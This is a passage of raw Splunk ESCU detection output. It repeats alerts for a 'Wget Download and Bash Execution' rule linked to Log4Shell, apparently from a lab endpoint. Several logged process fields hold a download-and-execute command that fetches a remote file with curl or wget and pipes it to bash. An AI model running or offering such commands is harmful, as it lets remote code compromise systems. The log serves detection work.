CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642646016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645755, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial 